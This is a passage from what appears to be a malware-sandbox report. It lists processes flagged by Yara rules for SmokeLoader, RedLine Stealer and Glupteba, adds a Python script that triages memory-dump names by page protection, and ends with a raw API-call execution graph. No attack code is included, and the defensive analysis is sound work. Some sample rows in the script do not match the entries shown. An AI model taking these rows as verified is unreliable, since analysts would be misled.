Start date:23/04/2024
Path:C:\Users\user\Pictures\G3pV8gTsWQBVrGpK4ooPrlxI.exe
Wow64 process (32bit):true
Commandline:"C:\Users\user\Pictures\G3pV8gTsWQBVrGpK4ooPrlxI.exe"
Imagebase:0x400000
File size:473'089 bytes
MD5 hash:CCEE6D525CB5940F123C86DB6EDD40DA
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000029.00000002.2099601729.00000000041B0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
• Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000029.00000003.2080394798.0000000006A3A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000029.00000002.2100222351.00000000043EC000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
Has exited:true

Target ID:42
Start time:21:37:33
Start date:23/04/2024
Path:C:\Users\user\Pictures\vU4jsQbpuBQoMcavMx7b1jzX.exe
Wow64 process (32bit):true
Commandline:"C:\Users\user\Pictures\vU4jsQbpuBQoMcavMx7b1jzX.exe" --silent --allusers=0
Imagebase:0xfd0000
File size:5'387'648 bytes
MD5 hash:409B00F4B0A921D4691FE3EFB0AD4092
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:43
Start time:21:37:34
Start date:23/04/2024
Path:C:\Users\user\Pictures\OYqxk9G3x4R05N4I0KLZXbXg.exe
Wow64 process (32bit):true
Commandline:"C:\Users\user\Pictures\OYqxk9G3x4R05N4I0KLZXbXg.exe"
Imagebase:0x400000
File size:4'405'128 bytes
MD5 hash:F6C9E6F8396274E57FBA6BE593B90E36
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Glupteba, Description: Yara detected Glupteba, Source: 0000002B.00000001.1972234564.0000000000843000.00000040.00000001.01000000.00000022.sdmp, Author: Joe Security
Has exited:false

Target ID:44
Start time:21:37:35
Start date:23/04/2024
Path:C:\Users\user\Pictures\nxx62MIcAq1mLUazdUlt2emv.exe
Wow64 process (32bit):true
Commandline:"C:\Users\user\Pictures\nxx62MIcAq1mLUazdUlt2emv.exe" --silent --allusers=0
Imagebase:0x480000
File size:5'387'648 bytes
MD5 hash:2CF99CA2E0CB98555FCA7D2FB3187553
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:45
Start time:21:37:35
Start date:23/04/2024
Path:C:\Users\user\Documents\SimpleAdobe\UWxz0MPLJemfxFfuxrp6E5vU.exe
Wow64 process (32bit):true
Commandline:C:\Users\user\Documents\SimpleAdobe\UWxz0MPLJemfxFfuxrp6E5vU.exe
Imagebase:0xd80000
File size:3'679'520 bytes
MD5 hash:A1789F6DBB08B8F49452DB52D3829002
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:46
Start time:21:37:35
Start date:23/04/2024
Path:C:\Users\user\Documents\SimpleAdobe\F0mqqGl9pK9gdOm2cnZsC1mR.exe
Wow64 process (32bit):true
Commandline:C:\Users\user\Documents\SimpleAdobe\F0mqqGl9pK9gdOm2cnZsC1mR.exe
Imagebase:0x9a0000
File size:5'077'008 bytes
MD5 hash:D15459E9B9D12244A57809BC383B2757
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true
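The Yara hits above are reported against memory-dump names rather than files, and the name encodes where in the process the hit landed. That is the triage question for this kind of loader: a RedLine or SmokeLoader signature in private, executable, writable memory means the payload was unpacked or injected at runtime, while the Glupteba hit sits in image-backed memory whose protection has been raised to execute+write, consistent with the "changes PE section rights" signature. The decoder below is an added example, not part of the Joe Sandbox report or its tooling. The field layout is inferred from the names on this page: the first field is the Target ID in hex (0x29 = 41 and 0x2B = 43 match the entries above), the fourth lines up with a base address, and the fifth and seventh with a winnt.h PAGE_* protection and a MEMORY_BASIC_INFORMATION.Type. The meaning of the second, third, sixth and eighth fields is an assumption, so they are kept raw. The sample rows are constructed from the Source strings in the entries above.

```python
"""Decode Joe Sandbox memory-dump identifiers from Yara 'Source:' fields and
triage each hit by the memory type and protection it was found in.

Added example, not part of the sandbox report. Field positions beyond the
target id, base address, protection and memory type are assumptions.
"""
import re
from dataclasses import dataclass

# Page protection constants from winnt.h.
PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
EXEC_MASK = 0x10 | 0x20 | 0x40 | 0x80
WRITE_MASK = 0x04 | 0x08 | 0x40 | 0x80

# MEMORY_BASIC_INFORMATION.Type values from winnt.h.
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}

_DUMP_RE = re.compile(
    r"^(?P<target>[0-9A-Fa-f]{8})\.(?P<phase>[0-9A-Fa-f]{8})\.(?P<seq>\d+)\."
    r"(?P<base>[0-9A-Fa-f]{16})\.(?P<protect>[0-9A-Fa-f]{8})\.(?P<f6>[0-9A-Fa-f]{8})\."
    r"(?P<mtype>[0-9A-Fa-f]{8})\.(?P<f8>[0-9A-Fa-f]{8})\.sdmp$"
)


@dataclass(frozen=True)
class DumpRegion:
    target_id: int   # Target ID of the process, decoded from hex (matches the report)
    phase: int       # assumption: dump pass (1 at start, 2 at exit, 3 during the run)
    seq: int         # assumption: per-analysis counter, kept raw
    base: int        # region base address
    protect: int     # PAGE_* value at dump time
    mem_type: int    # MEM_PRIVATE / MEM_MAPPED / MEM_IMAGE
    field6: int      # unknown, kept raw
    field8: int      # unknown, kept raw

    @property
    def protect_name(self) -> str:
        # Drop modifier bits such as PAGE_GUARD before the lookup.
        return PAGE_PROTECT.get(self.protect & 0xFF, f"0x{self.protect:x}")

    @property
    def mem_type_name(self) -> str:
        return MEM_TYPE.get(self.mem_type, f"0x{self.mem_type:x}")

    @property
    def executable(self) -> bool:
        return bool(self.protect & EXEC_MASK)

    @property
    def writable(self) -> bool:
        return bool(self.protect & WRITE_MASK)


def parse_dump_name(name: str) -> DumpRegion:
    """Split '<8hex>.<8hex>.<digits>.<16hex>.<8hex>.<8hex>.<8hex>.<8hex>.sdmp' into fields."""
    m = _DUMP_RE.match(name.strip())
    if not m:
        raise ValueError(f"not a Joe Sandbox dump name: {name!r}")
    g = m.groupdict()
    return DumpRegion(
        target_id=int(g["target"], 16), phase=int(g["phase"], 16), seq=int(g["seq"]),
        base=int(g["base"], 16), protect=int(g["protect"], 16), mem_type=int(g["mtype"], 16),
        field6=int(g["f6"], 16), field8=int(g["f8"], 16),
    )


def classify(region: DumpRegion) -> str:
    """State what kind of memory a Yara hit landed in; this drives the triage verdict."""
    if region.mem_type_name == "MEM_IMAGE":
        if region.writable and region.executable:
            return "image-backed code with write access (PE section rights changed)"
        return "image-backed code (on-disk PE, not a runtime unpack)"
    if region.executable:
        return "executable private/mapped memory (unpacked or injected code)"
    return "non-executable memory (data, strings or a staged buffer)"


# Constructed from the Yara 'Source:' fields in the process entries above.
SAMPLE_MATCHES = [
    ("Windows_Trojan_RedLineStealer_ed346e4c",
     "00000027.00000002.2175970589.000000000418C000.00000040.00000020.00020000.00000000.sdmp"),
    ("JoeSecurity_DelphiSystemParamCount",
     "00000027.00000003.2086147863.0000000006A37000.00000004.00000020.00020000.00000000.sdmp"),
    ("Windows_Trojan_Smokeloader_3687686f",
     "00000027.00000002.2184889083.0000000004440000.00000040.00001000.00020000.00000000.sdmp"),
    ("JoeSecurity_Glupteba",
     "0000002B.00000001.1972234564.0000000000843000.00000040.00000001.01000000.00000022.sdmp"),
]


def triage(matches):
    """Return one (rule, target id, base, protection, type, verdict) row per hit."""
    rows = []
    for rule, source in matches:
        r = parse_dump_name(source)
        rows.append((rule, r.target_id, f"0x{r.base:x}", r.protect_name, r.mem_type_name, classify(r)))
    return rows


if __name__ == "__main__":
    for row in triage(SAMPLE_MATCHES):
        print(" | ".join(str(c) for c in row))
```

Run it against the Source strings of any process entry: hits that resolve to MEM_PRIVATE with PAGE_EXECUTE_READWRITE are the regions to carve and hand to a config extractor, while a hit in PAGE_READWRITE memory (the Delphi ParamCount rule here) is a string or data match and carries no code on its own.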


Execution Graph

Execution Coverage:5.9%
Dynamic/Decrypted Code Coverage:0%
Signature Coverage:30.9%
Total number of Nodes:828
Total number of Limit Nodes:17
execution_graph: serialized node and edge data of the rendered call graph (node ids, function addresses in the 0x7ff6385c0000-0x7ff63862b000 range and per-node API call counts). The Windows APIs named on the graph's nodes are GetLastError, SetLastError, Sleep, RaiseFailFastException, GetStdHandle, WriteFile, FlsAlloc, FlsGetValue, FlsSetValue, GetModuleHandleExW, GetCurrentProcess, GetProcessAffinityMask, QueryInformationJobObject and RtlAddVectoredExceptionHandler, plus the CRT routine _swprintf_c_l; the graph itself is only viewable in the interactive report.
19075->19076 19077 7ff6385cb4d0 19076->19077 19077->18964 19081 7ff6385d05f0 19078->19081 19079 7ff63862abf0 8 API calls 19082 7ff6385d076d 19079->19082 19080 7ff6385d0670 _wcsicmp 19080->19081 19083 7ff6385d068d 19080->19083 19081->19080 19081->19083 19082->19070 19083->19079 19085 7ff63862abf9 19084->19085 19086 7ff63862b548 IsProcessorFeaturePresent 19085->19086 19087 7ff6385cb2de 19085->19087 19088 7ff63862b560 19086->19088 19087->18940 19093 7ff63862b61c RtlCaptureContext 19088->19093 19094 7ff63862b636 RtlLookupFunctionEntry 19093->19094 19095 7ff63862b64c RtlVirtualUnwind 19094->19095 19096 7ff63862b573 19094->19096 19095->19094 19095->19096 19097 7ff63862b514 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 19096->19097 19099 7ff63862ab44 _swprintf_c_l 3 API calls 19098->19099 19100 7ff6385c90c5 19099->19100 19101 7ff6385c9104 19100->19101 19145 7ff6385d1d80 19100->19145 19101->18911 19103 7ff6385c90d2 19103->19101 19104 7ff6385ced90 InitializeCriticalSectionEx 19103->19104 19105 7ff6385c90fd 19104->19105 19105->18911 19107 7ff6385ced90 InitializeCriticalSectionEx 19106->19107 19108 7ff6385c6e3b 19107->19108 19108->18912 19109 7ff6385c5550 19108->19109 19110 7ff63862ab44 _swprintf_c_l 3 API calls 19109->19110 19112 7ff6385c556e 19110->19112 19111 7ff6385c5615 19111->18916 19112->19111 19148 7ff6385c7230 19112->19148 19114 7ff6385c55ab 19114->18916 19116 7ff6385cf533 19115->19116 19117 7ff6385cf44b 19115->19117 19116->18923 19118 7ff63862ab44 _swprintf_c_l 3 API calls 19117->19118 19119 7ff6385cf46f 19118->19119 19120 7ff6385ced90 InitializeCriticalSectionEx 19119->19120 19121 7ff6385cf4a2 QueryPerformanceFrequency GetSystemTimeAsFileTime QueryPerformanceCounter 19120->19121 19121->19116 19123 7ff63862a4e3 19122->19123 19124 7ff6385cb595 EventRegister 19123->19124 19125 7ff6385ced90 InitializeCriticalSectionEx 19124->19125 19126 7ff6385cb60b 19125->19126 19151 7ff6385cc040 19126->19151 19129 7ff6385cb64e 19129->18926 
19130 7ff6385cb62a 19130->19129 19167 7ff6385c8d60 19130->19167 19132 7ff6385cb633 19132->19129 19174 7ff6385cd450 19132->19174 19133 7ff6385cb643 19133->18926 19137 7ff6385c6ce5 19136->19137 19141 7ff6385c6c04 19136->19141 19138 7ff6385c6e0f 19137->19138 19139 7ff6385cca50 2 API calls 19137->19139 19138->18912 19143 7ff6385ced90 19138->19143 19140 7ff6385c6e02 RaiseFailFastException 19139->19140 19140->19138 19141->19137 19445 7ff6385cca00 LoadLibraryExW 19141->19445 19144 7ff63862a7a1 InitializeCriticalSectionEx 19143->19144 19146 7ff6385ced90 InitializeCriticalSectionEx 19145->19146 19147 7ff6385d1dcc 19146->19147 19147->19103 19149 7ff63862ab44 _swprintf_c_l 3 API calls 19148->19149 19150 7ff6385c724e 19149->19150 19150->19114 19181 7ff6385d3d20 19151->19181 19153 7ff6385cb616 19153->19129 19154 7ff6385db020 19153->19154 19192 7ff6385d48e0 QueryPerformanceFrequency 19154->19192 19156 7ff6385db030 19158 7ff6385db0d2 19156->19158 19193 7ff6385d4230 19156->19193 19166 7ff6385db344 19158->19166 19207 7ff6385f2050 19158->19207 19160 7ff6385db4df 19161 7ff63862ab44 _swprintf_c_l 3 API calls 19160->19161 19160->19166 19162 7ff6385db61d 19161->19162 19162->19166 19236 7ff6385d3e70 19162->19236 19164 7ff6385db640 19164->19166 19241 7ff6385f0ae0 19164->19241 19166->19130 19168 7ff6385c8d72 19167->19168 19169 7ff6385c8dad 19168->19169 19425 7ff6385d1c10 CreateEventW 19168->19425 19169->19132 19171 7ff6385c8d84 19171->19169 19426 7ff6385ccb30 CreateThread 19171->19426 19173 7ff6385c8da3 19173->19132 19175 7ff6385cd467 19174->19175 19176 7ff6385cd46f 19175->19176 19177 7ff63862ab44 _swprintf_c_l 3 API calls 19175->19177 19176->19133 19179 7ff6385cd4a1 19177->19179 19180 7ff6385cd535 19179->19180 19429 7ff6385d6240 19179->19429 19180->19133 19186 7ff6385d6b30 19181->19186 19184 7ff6385d3d5f 19184->19153 19187 7ff63862ab44 _swprintf_c_l 3 API calls 19186->19187 19188 7ff6385d3d48 19187->19188 19188->19184 19189 7ff6385d8690 19188->19189 19190 7ff63862ab44 _swprintf_c_l 3 API 
calls 19189->19190 19191 7ff6385d86a5 19190->19191 19191->19184 19192->19156 19194 7ff6385d4253 19193->19194 19195 7ff6385d43a4 19194->19195 19196 7ff6385d4267 GetCurrentProcess IsProcessInJob 19194->19196 19199 7ff6385d43f2 GlobalMemoryStatusEx 19195->19199 19200 7ff6385d43e8 19195->19200 19197 7ff6385d4363 19196->19197 19198 7ff6385d42bc 19196->19198 19197->19195 19202 7ff6385d437b GlobalMemoryStatusEx 19197->19202 19198->19197 19201 7ff6385d42c6 QueryInformationJobObject 19198->19201 19199->19200 19203 7ff63862abf0 8 API calls 19200->19203 19201->19197 19204 7ff6385d42e8 19201->19204 19202->19195 19205 7ff6385d4434 19203->19205 19204->19197 19206 7ff6385d432c GlobalMemoryStatusEx 19204->19206 19205->19158 19206->19197 19266 7ff6385d4940 VirtualAlloc 19207->19266 19209 7ff6385f2078 19212 7ff6385f20e4 19209->19212 19350 7ff6385d46d0 InitializeCriticalSection 19209->19350 19269 7ff6385fd210 19212->19269 19213 7ff6385f213f 19235 7ff6385f2358 19213->19235 19301 7ff6385f1e40 19213->19301 19215 7ff6385f2253 19305 7ff6385ef4b0 19215->19305 19219 7ff6385f2299 19220 7ff6385f22b5 EnterCriticalSection 19219->19220 19221 7ff6385f2302 19219->19221 19219->19235 19222 7ff6385f22d1 19220->19222 19223 7ff6385f22de LeaveCriticalSection 19220->19223 19224 7ff6385d4980 3 API calls 19221->19224 19222->19223 19225 7ff6385f2341 LeaveCriticalSection 19222->19225 19223->19221 19226 7ff6385f2313 19224->19226 19227 7ff6385f234d 19225->19227 19228 7ff6385f2317 19226->19228 19231 7ff6385f2382 19226->19231 19351 7ff6385d4a30 VirtualFree 19227->19351 19228->19227 19230 7ff6385f2320 EnterCriticalSection 19228->19230 19230->19225 19231->19235 19312 7ff638604be0 19231->19312 19235->19160 19237 7ff63862ab44 _swprintf_c_l 3 API calls 19236->19237 19238 7ff6385d3e96 19237->19238 19239 7ff6385d3e9e CreateEventW 19238->19239 19240 7ff6385d3ec0 19238->19240 19239->19240 19240->19164 19242 7ff6385f0b66 _swprintf_c_l 19241->19242 19243 7ff6385d3e70 4 API calls 19242->19243 19244 7ff6385f0b74 19243->19244 
19245 7ff6385f1567 19244->19245 19412 7ff6385d48c0 QueryPerformanceCounter 19244->19412 19245->19166 19247 7ff6385f0b92 19413 7ff6385f3ff0 19247->19413 19249 7ff6385f0eb7 19249->19245 19250 7ff6385f3ff0 7 API calls 19249->19250 19251 7ff6385f0f50 19250->19251 19251->19245 19252 7ff6385f3ff0 7 API calls 19251->19252 19253 7ff6385f0fc4 19252->19253 19253->19245 19254 7ff6385f4180 2 API calls 19253->19254 19255 7ff6385f114e 19253->19255 19254->19253 19255->19245 19256 7ff63862ab44 _swprintf_c_l 3 API calls 19255->19256 19257 7ff6385f13ca 19256->19257 19257->19245 19258 7ff6385f142d 19257->19258 19259 7ff6385f1416 19257->19259 19260 7ff63862ab44 _swprintf_c_l 3 API calls 19258->19260 19259->19245 19261 7ff6385f1423 DebugBreak 19259->19261 19262 7ff6385f1479 19260->19262 19261->19245 19262->19245 19263 7ff63862ab44 _swprintf_c_l 3 API calls 19262->19263 19264 7ff6385f1506 19263->19264 19264->19245 19424 7ff6385d46d0 InitializeCriticalSection 19264->19424 19267 7ff6385d4961 VirtualFree 19266->19267 19268 7ff6385d4979 19266->19268 19267->19209 19268->19209 19287 7ff6385fd278 19269->19287 19270 7ff6385fdc45 19270->19213 19272 7ff6385fd85d 19273 7ff638602090 22 API calls 19272->19273 19274 7ff6385fd88e 19273->19274 19276 7ff638602090 22 API calls 19274->19276 19275 7ff6385fd771 19275->19272 19277 7ff6385d4a50 3 API calls 19275->19277 19280 7ff6385fd852 19275->19280 19294 7ff6385fd588 19275->19294 19278 7ff6385fd8a8 19276->19278 19279 7ff6385fd7ee 19277->19279 19282 7ff638602090 22 API calls 19278->19282 19279->19280 19279->19294 19363 7ff6385d4a30 VirtualFree 19279->19363 19364 7ff6385d4a30 VirtualFree 19280->19364 19285 7ff6385fd9ac 19282->19285 19284 7ff6385d4980 3 API calls 19284->19294 19286 7ff6385fdabe 19285->19286 19285->19294 19365 7ff6385d4a30 VirtualFree 19285->19365 19288 7ff6385fdae9 19286->19288 19366 7ff6385d4a30 VirtualFree 19286->19366 19287->19270 19289 7ff638602090 22 API calls 19287->19289 19293 7ff6385fd63c 19287->19293 19287->19294 19295 7ff6385fd5d4 
19287->19295 19298 7ff6385fdb0f 19288->19298 19367 7ff6385d4a30 VirtualFree 19288->19367 19289->19287 19352 7ff638602090 19293->19352 19294->19270 19294->19284 19295->19293 19362 7ff6385d4a30 VirtualFree 19295->19362 19297 7ff638602090 22 API calls 19297->19298 19298->19270 19298->19294 19298->19297 19299 7ff6385fdc49 19298->19299 19299->19270 19368 7ff6385d4a30 VirtualFree 19299->19368 19303 7ff6385f1e5f 19301->19303 19304 7ff6385f1e7c 19303->19304 19381 7ff6385d3f30 19303->19381 19304->19215 19306 7ff6385ef512 19305->19306 19307 7ff63862abf0 8 API calls 19306->19307 19308 7ff6385ef62c 19307->19308 19309 7ff6385d4a50 19308->19309 19310 7ff6385d4a94 GetCurrentProcess VirtualAllocExNuma 19309->19310 19311 7ff6385d4a75 VirtualAlloc 19309->19311 19310->19219 19311->19310 19388 7ff638604af0 19312->19388 19315 7ff6385f17b0 19322 7ff6385f17e0 19315->19322 19316 7ff6385f1e0b 19410 7ff6385d3dd0 CloseHandle 19316->19410 19317 7ff6385f1e17 19319 7ff6385f1e20 19317->19319 19320 7ff6385f1e2c 19317->19320 19411 7ff6385d3dd0 CloseHandle 19319->19411 19320->19235 19323 7ff6385d3e70 4 API calls 19322->19323 19348 7ff6385f183f 19322->19348 19324 7ff6385f1886 19323->19324 19325 7ff6385d3e70 4 API calls 19324->19325 19324->19348 19326 7ff6385f189c _swprintf_c_l 19325->19326 19326->19348 19394 7ff6385d4050 19326->19394 19328 7ff6385f1bfd 19329 7ff6385d3e70 4 API calls 19328->19329 19330 7ff6385f1c7a 19329->19330 19331 7ff6385f1cbc 19330->19331 19334 7ff6385d3e70 4 API calls 19330->19334 19332 7ff6385f1dc3 19331->19332 19333 7ff6385f1db7 19331->19333 19331->19348 19336 7ff6385f1dcc 19332->19336 19337 7ff6385f1dd8 19332->19337 19406 7ff6385d3dd0 CloseHandle 19333->19406 19338 7ff6385f1c90 19334->19338 19407 7ff6385d3dd0 CloseHandle 19336->19407 19340 7ff6385f1de1 19337->19340 19341 7ff6385f1ded 19337->19341 19338->19331 19401 7ff6385d3df0 19338->19401 19408 7ff6385d3dd0 CloseHandle 19340->19408 19344 7ff6385f1df6 19341->19344 19341->19348 19409 7ff6385d3dd0 CloseHandle 19344->19409 
19345 7ff6385f1ca6 19345->19331 19347 7ff6385d3e70 4 API calls 19345->19347 19347->19331 19348->19316 19348->19317 19349 7ff6385f1d6a 19348->19349 19349->19235 19350->19212 19351->19235 19353 7ff6386020bf 19352->19353 19354 7ff6386020f5 19353->19354 19355 7ff6386020ff 19353->19355 19360 7ff638602127 19353->19360 19369 7ff6385d4ad0 19354->19369 19357 7ff6385d4a50 3 API calls 19355->19357 19359 7ff63860210d 19357->19359 19359->19360 19380 7ff6385d4a30 VirtualFree 19359->19380 19360->19275 19362->19295 19363->19280 19364->19272 19365->19286 19366->19288 19367->19298 19368->19299 19370 7ff6385d4afe LookupPrivilegeValueW 19369->19370 19371 7ff6385d4b96 GetLargePageMinimum 19369->19371 19372 7ff6385d4bcf 19370->19372 19373 7ff6385d4b1a GetCurrentProcess OpenProcessToken 19370->19373 19374 7ff6385d4bd3 GetCurrentProcess VirtualAllocExNuma 19371->19374 19375 7ff6385d4bb6 VirtualAlloc 19371->19375 19378 7ff63862abf0 8 API calls 19372->19378 19373->19372 19376 7ff6385d4b51 AdjustTokenPrivileges GetLastError CloseHandle 19373->19376 19374->19372 19375->19372 19376->19372 19377 7ff6385d4b8b 19376->19377 19377->19371 19377->19372 19379 7ff6385d4c06 19378->19379 19379->19359 19380->19360 19382 7ff6385d3f38 19381->19382 19383 7ff6385d3f51 GetLogicalProcessorInformation 19382->19383 19387 7ff6385d3f7d 19382->19387 19384 7ff6385d3f72 GetLastError 19383->19384 19385 7ff6385d3f84 19383->19385 19384->19385 19384->19387 19386 7ff6385d3fc1 GetLogicalProcessorInformation 19385->19386 19385->19387 19386->19387 19387->19304 19389 7ff638604b09 19388->19389 19393 7ff6385f248c 19388->19393 19390 7ff638604b24 LoadLibraryExW 19389->19390 19389->19393 19391 7ff638604b52 GetProcAddress 19390->19391 19390->19393 19392 7ff638604b67 19391->19392 19392->19393 19393->19315 19395 7ff6385d413f GlobalMemoryStatusEx 19394->19395 19396 7ff6385d4087 GetCurrentProcess 19394->19396 19400 7ff6385d40a8 19395->19400 19397 7ff6385d40a0 19396->19397 19397->19395 19397->19400 19398 7ff63862abf0 8 API calls 19399 
7ff6385d4218 19398->19399 19399->19328 19400->19398 19402 7ff63862ab44 _swprintf_c_l 3 API calls 19401->19402 19403 7ff6385d3e16 19402->19403 19404 7ff6385d3e1e CreateEventW 19403->19404 19405 7ff6385d3e3e 19403->19405 19404->19405 19405->19345 19406->19332 19407->19337 19408->19341 19409->19348 19410->19317 19411->19320 19412->19247 19416 7ff6385f4016 19413->19416 19414 7ff6385f40ca 19417 7ff6385d4980 3 API calls 19414->19417 19422 7ff6385f4113 19414->19422 19415 7ff6385f4067 EnterCriticalSection 19418 7ff6385f4083 19415->19418 19416->19414 19416->19415 19419 7ff6385f40df 19417->19419 19420 7ff6385f40a5 LeaveCriticalSection 19418->19420 19421 7ff6385f4107 LeaveCriticalSection 19418->19421 19419->19422 19423 7ff6385f40ec EnterCriticalSection 19419->19423 19420->19414 19421->19422 19422->19249 19423->19421 19424->19245 19425->19171 19427 7ff6385ccb65 SetThreadPriority ResumeThread FindCloseChangeNotification 19426->19427 19428 7ff6385ccb5f 19426->19428 19427->19173 19428->19173 19430 7ff6385d6273 _swprintf_c_l 19429->19430 19434 7ff6385d6299 _swprintf_c_l 19430->19434 19435 7ff6385d7210 19430->19435 19432 7ff6385d6290 19433 7ff6385ced90 InitializeCriticalSectionEx 19432->19433 19432->19434 19433->19434 19434->19179 19434->19434 19436 7ff6385d4a50 3 API calls 19435->19436 19437 7ff6385d7232 19436->19437 19438 7ff6385d723a 19437->19438 19439 7ff6385d4980 3 API calls 19437->19439 19438->19432 19440 7ff6385d7258 19439->19440 19443 7ff6385d7263 _swprintf_c_l 19440->19443 19444 7ff6385d4a30 VirtualFree 19440->19444 19442 7ff6385d737e 19442->19432 19443->19432 19444->19442 19446 7ff6385cca1e GetProcAddress 19445->19446 19447 7ff6385cca33 19445->19447 19446->19447 19447->19137 19448->18936 19449 7ff6386c4fc0 19452 7ff6386c5070 19449->19452 19451 7ff6386c4fce 19454 7ff6386c508f 19452->19454 19453 7ff6386c50de 19453->19451 19454->19453 19455 7ff6386c50bb CoInitializeEx 19454->19455 19456 7ff6386c50d2 19455->19456 19456->19453 19457 7ff6386c512a 19456->19457 19461 7ff6385c4c80 
19456->19461 19458 7ff6385c4c80 28 API calls 19457->19458 19460 7ff6386c5149 19458->19460 19462 7ff6385c4d3b 19461->19462 19467 7ff6386ecbf0 19462->19467 19468 7ff6386ecc02 19467->19468 19471 7ff6386ecca0 19468->19471 19470 7ff6386ecc41 19484 7ff6385ca7c0 19471->19484 19473 7ff6386ecdda 19516 7ff6385c4b30 19473->19516 19474 7ff6386ecdac 19474->19473 19512 7ff6386ec830 19474->19512 19476 7ff6386ecd1a 19476->19474 19504 7ff6385ca910 19476->19504 19479 7ff6385ca7c0 12 API calls 19482 7ff6386ece05 19479->19482 19481 7ff6386ece4b 19481->19470 19482->19481 19483 7ff6385ca910 18 API calls 19482->19483 19483->19482 19485 7ff6385ca803 _swprintf_c_l 19484->19485 19486 7ff6385ca81d 19485->19486 19487 7ff6385ca869 19485->19487 19490 7ff6385cf550 6 API calls 19486->19490 19493 7ff6385ca837 _swprintf_c_l 19486->19493 19488 7ff6385ca883 19487->19488 19489 7ff6385cf550 6 API calls 19487->19489 19491 7ff6385ca8b4 19488->19491 19492 7ff6385ca89f 19488->19492 19489->19488 19490->19493 19495 7ff6385ca3a0 2 API calls 19491->19495 19494 7ff6385ca3a0 2 API calls 19492->19494 19520 7ff6385c9c50 19493->19520 19498 7ff6385ca8ab 19494->19498 19495->19498 19500 7ff6385ca867 19498->19500 19501 7ff6385cf550 6 API calls 19498->19501 19502 7ff6385ca8eb 19500->19502 19533 7ff6385c9600 19500->19533 19501->19500 19502->19476 19505 7ff6385ca952 _swprintf_c_l 19504->19505 19546 7ff6385c9ff0 19505->19546 19507 7ff6385ca973 19508 7ff6385ca994 19507->19508 19509 7ff6385cf550 6 API calls 19507->19509 19510 7ff6385c9600 2 API calls 19508->19510 19511 7ff6385ca9a5 19508->19511 19509->19508 19510->19511 19511->19476 19513 7ff6386ec864 19512->19513 19575 7ff6385c4890 19513->19575 19515 7ff6386ec8a1 19515->19473 19517 7ff6385c4b58 _swprintf_c_l 19516->19517 19518 7ff6385c4b71 RaiseFailFastException 19517->19518 19519 7ff6385c4b7e 19517->19519 19518->19519 19519->19479 19523 7ff6385c9c6d _swprintf_c_l 19520->19523 19521 7ff6385c9e40 19528 7ff6385ca3a0 19521->19528 19522 7ff6385c9e1f 19522->19521 19527 
7ff6385cf550 6 API calls 19522->19527 19523->19521 19523->19522 19524 7ff6385c9e17 19523->19524 19525 7ff6385c9e08 RaiseFailFastException 19523->19525 19539 7ff6385ca600 19524->19539 19525->19522 19527->19521 19529 7ff6385ca407 19528->19529 19530 7ff6385ca3b2 19528->19530 19529->19500 19530->19529 19531 7ff6385c9600 2 API calls 19530->19531 19532 7ff6385ca3e2 19531->19532 19532->19500 19534 7ff6385c9616 19533->19534 19537 7ff6385c9691 19533->19537 19535 7ff6385c965c RaiseFailFastException 19534->19535 19536 7ff6385c9669 19534->19536 19534->19537 19535->19536 19536->19537 19538 7ff6385c9684 RaiseFailFastException 19536->19538 19537->19502 19538->19537 19542 7ff6385ca616 19539->19542 19540 7ff6385ca7a7 19540->19522 19541 7ff6385ca779 RaiseFailFastException 19541->19542 19542->19540 19542->19541 19543 7ff6385ca6e7 RaiseFailFastException 19542->19543 19544 7ff6385ca6fd RaiseFailFastException 19542->19544 19545 7ff6385ca78b 19542->19545 19543->19542 19544->19542 19545->19522 19560 7ff6385ca010 19546->19560 19547 7ff6385ca054 RaiseFailFastException 19547->19560 19548 7ff6385ca2db 19549 7ff6385c9c50 10 API calls 19548->19549 19554 7ff6385ca2b4 19548->19554 19549->19554 19550 7ff6385ca376 19550->19507 19551 7ff6385ca2c2 RaiseFailFastException 19551->19554 19552 7ff6385ca2d1 19553 7ff6385ca600 3 API calls 19552->19553 19553->19554 19554->19550 19555 7ff6385c9600 2 API calls 19554->19555 19557 7ff6385ca348 19555->19557 19556 7ff6385ca190 RaiseFailFastException 19556->19560 19557->19507 19559 7ff6385c9600 2 API calls 19559->19560 19560->19547 19560->19548 19560->19551 19560->19552 19560->19554 19560->19556 19560->19559 19561 7ff6385ca26e RaiseFailFastException 19560->19561 19562 7ff6385ca284 RaiseFailFastException 19560->19562 19563 7ff6385cf550 6 API calls 19560->19563 19564 7ff6385c9860 19560->19564 19561->19560 19562->19560 19563->19560 19565 7ff6385c988d 19564->19565 19566 7ff6385c98b7 19564->19566 19568 7ff6385cf550 6 API calls 19565->19568 19567 7ff6385c9a26 
